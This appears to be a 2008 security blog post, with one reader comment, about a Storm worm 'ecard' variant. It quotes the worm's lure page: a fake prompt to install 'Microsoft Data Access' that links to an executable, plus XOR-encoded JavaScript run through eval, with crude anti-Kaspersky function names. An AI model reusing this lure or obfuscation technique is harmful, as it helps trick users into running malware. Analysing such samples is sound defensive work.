Ecard Worm is using “function kaspersky(suck,dick){};”
This time ecard aka storm worm variant defined two function in the encoded java script. Just see the encoded Java Script..
“To view your ecard, you need to have Microsoft Data Access installed on your computer.<br> To obtain a free copy of Microsoft Data Access, please <a href=”/msdataaccess.exe”>click here</a>.<div id=”mydiv”></div><Script Language=’JavaScript’> function xor_str(plain_str, xor_key){ var xored_str = “”; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; } function kaspersky(suck,dick){}; function kaspersky2(suck_dick,again){};var plain_str = “\x7d\x50\x57\x50\x57\x2b\x3c\x2f\x7d\x30\x30\x7d\x60\x7d\x33\x38\x2a\x7d\x1c\x2f\x2f\x3c\x24\x75\x74\x66\x50\x57\x2b\x3c\x2f\x7d\x30\x38\x30\x02\x3b\x31\x3c\x3a\x7d\x60\x7d\x6d\x66\x50\x57\x50\x57\x57\x50\x57\x50\x57\x2e\x29\x3c\x2f\x29\x75\x74\x66\x50\x57\x50\x57”; var xored_str = xor_str(plain_str, 93); eval(xored_str); </script>
January 11, 2008 at 3:14 pm
LoL… and what the heck is the function of “kaspersky suck dick”????
and..
\x7d\x50\x57\x50\x57\x2b\x3c\x2f\x7d\x30\x30\x7d\x60\x7d\x33\x38\x2a\x7d\x1c\x2f\x2f\x3c\x24\x75\x74\x66\x50\x57\x2b\x3c\x2f\x7d\x30\x38\x30\x02\x3b\x31\x3c\x3a\x7d\x60\x7d\x6d\x66\x50\x57\x50\x57\x57\x50\x57\x50\x57\x2e\x29\x3c\x2f\x29\x75\x74\x66\x50\x57\x50\x57
Looks like a perl-code, not a java-code… lolz